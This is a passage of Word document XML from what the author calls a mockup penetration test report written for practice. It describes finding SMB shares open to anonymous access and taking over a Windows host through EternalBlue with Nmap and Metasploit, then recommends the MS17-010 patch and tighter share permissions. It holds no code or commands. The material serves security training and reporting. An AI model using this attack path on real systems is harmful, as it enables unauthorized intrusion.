              </w:rPr>
              <w:t>documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BB894AC" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="00BF3488"/>
    <w:p w14:paraId="0E6A133A" w14:textId="49D6B922" w:rsidR="009C36F8" w:rsidRPr="00295A59" w:rsidRDefault="009C36F8" w:rsidP="00295A59">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc169647976"/>
      <w:r w:rsidRPr="00295A59">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Risk Factors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="090B4184" w14:textId="7F549609" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>measured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>factors:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637733F3" w14:textId="77777777" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EE0853" w14:textId="50B41292" w:rsidR="009C36F8" w:rsidRPr="00295A59" w:rsidRDefault="009C36F8" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc169647977"/>
      <w:r w:rsidRPr="00295A59">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Likelihood</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="077C9BC0" w14:textId="114C5D06" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C36F8">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Likelihood measures the potential of a vulnerability being exploited. Ratings are given based on the difficulty of the attack, the available tools, attacker skill level, and client environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53035655" w14:textId="77777777" w:rsidR="009C36F8" w:rsidRDefault="009C36F8" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E78565A" w14:textId="5AB0C61D" w:rsidR="009C36F8" w:rsidRPr="00295A59" w:rsidRDefault="009C36F8" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc169647978"/>
      <w:r w:rsidRPr="00295A59">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0D95A085" w14:textId="403BBEDF" w:rsidR="00BC4E50" w:rsidRDefault="009C36F8" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C36F8">
        <w:t>Impact measures the potential vulnerability’s effect on operations, including confidentiality, integrity, and availability of client systems and/or data, reputational harm, and financial loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFEAD3" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A3CF7A" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2640EA31" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795BDBB3" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6204C3C3" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313F4DD2" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660C97DE" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2D19FD" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225DE1FA" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6E289E" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B907531" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3599BA3E" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16351771" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277DDFFD" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AD494D" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE3B745" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F20DD4E" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9617DF" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56605066" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552C30A5" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AAC4CC" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C47A993" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37605A3B" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73281732" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571D882E" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6288B3AA" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8521EC" w14:textId="77777777" w:rsidR="006528B5" w:rsidRPr="00BC4E50" w:rsidRDefault="006528B5" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6F7835" w14:textId="02EE5DEB" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc169647979"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5553B346" w14:textId="77777777" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="009C36F8"/>
    <w:p w14:paraId="150E278D" w14:textId="6268E363" w:rsidR="00BD2591" w:rsidRPr="003D74C7" w:rsidRDefault="003A1406" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>This report is</w:t>
      </w:r>
      <w:r w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> a mockup penetration test report to enhance my writing skills and to easily identify misconfigurations and vulnerabilities present in a system. This process will also help me build a manual findings database to gain a comprehensive understanding of the underlying </w:t>
      </w:r>
      <w:r w:rsidR="000354F2" w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilities and exploits present on </w:t>
      </w:r>
      <w:r w:rsidR="0081790E" w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidR="000354F2" w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidR="0081790E" w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> I pwned</w:t>
      </w:r>
      <w:r w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681CC5E1" w14:textId="672C7618" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc169647980"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Testing Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="33647EDF" w14:textId="77777777" w:rsidR="0051228A" w:rsidRPr="0051228A" w:rsidRDefault="0051228A" w:rsidP="0051228A"/>
    <w:p w14:paraId="515839C7" w14:textId="77777777" w:rsidR="005970C6" w:rsidRDefault="0058535E" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">During the penetration testing process, we conducted an Nmap scan to identify open ports on the target machine. The scan revealed that ports 139 and 445, which are associated with SMB services, were open. Utilizing an Nmap NSE script, we identified that the machine is vulnerable to the EternalBlue exploit, classified as Finding IPT-001. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4277B" w14:textId="30C359C9" w:rsidR="00BD2591" w:rsidRPr="003D74C7" w:rsidRDefault="0058535E" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D74C7">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Additionally, we discovered that the machine has two SMB file shares that allow anonymous login, granting anonymous access. With the knowledge that the machine is susceptible to the EternalBlue exploit, we proceeded to use Metasploit to exploit this vulnerability. As a result, we were able to gain instant access to the machine with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF52B55" w14:textId="1B147B79" w:rsidR="0051228A" w:rsidRDefault="00BC4E50" w:rsidP="0051228A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc169647981"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tester Notes and Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="65042A3F" w14:textId="77777777" w:rsidR="0051228A" w:rsidRPr="0051228A" w:rsidRDefault="0051228A" w:rsidP="0051228A"/>
    <w:p w14:paraId="6D65A1B5" w14:textId="77777777" w:rsidR="000F0C59" w:rsidRPr="000F0C59" w:rsidRDefault="000F0C59" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0C59">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>During the assessment, it was found that the machine is vulnerable to the EternalBlue exploit, a remote code execution vulnerability affecting Windows hosts. This vulnerability arises from improper handling of certain requests in Microsoft Server Message Block 1.0 (SMBv1). When an unauthenticated attacker sends a specially crafted packet, they can execute arbitrary code on the affected machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF98BA5" w14:textId="77777777" w:rsidR="000F0C59" w:rsidRPr="000F0C59" w:rsidRDefault="000F0C59" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766F328C" w14:textId="77777777" w:rsidR="000F0C59" w:rsidRPr="000F0C59" w:rsidRDefault="000F0C59" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0C59">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To mitigate this vulnerability, it is recommended that all Windows clients and servers deploy the security patch available from Microsoft in MS17-010. Updating the software to the latest version of Windows will ensure that the system is protected against this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F31D92" w14:textId="77777777" w:rsidR="000F0C59" w:rsidRPr="000F0C59" w:rsidRDefault="000F0C59" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01965A9D" w14:textId="63C2357D" w:rsidR="000F0C59" w:rsidRDefault="000F0C59" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F0C59">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Additionally, the SMB file shares on the machine were discovered to have anonymous access. This configuration could allow adversaries to discover sensitive information within the environment and potentially write malicious files to the shares. It is advised to review the share privileges to ensure that users are granted access in accordance with the principle of least privilege. This will help minimize the risk of unauthorized access and potential exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E3003" w14:textId="77777777" w:rsidR="0051228A" w:rsidRDefault="0051228A" w:rsidP="000F0C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F71922" w14:textId="77777777" w:rsidR="0051228A" w:rsidRDefault="0051228A" w:rsidP="000F0C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B28569E" w14:textId="77777777" w:rsidR="0051228A" w:rsidRPr="000F0C59" w:rsidRDefault="0051228A" w:rsidP="000F0C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F915966" w14:textId="61109308" w:rsidR="00BC4E50" w:rsidRDefault="00BC4E50" w:rsidP="00BC4E50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc169647982"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Streng</w:t>
      </w:r>
      <w:r w:rsidR="00BD2591">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BD2591">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Weaknesses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
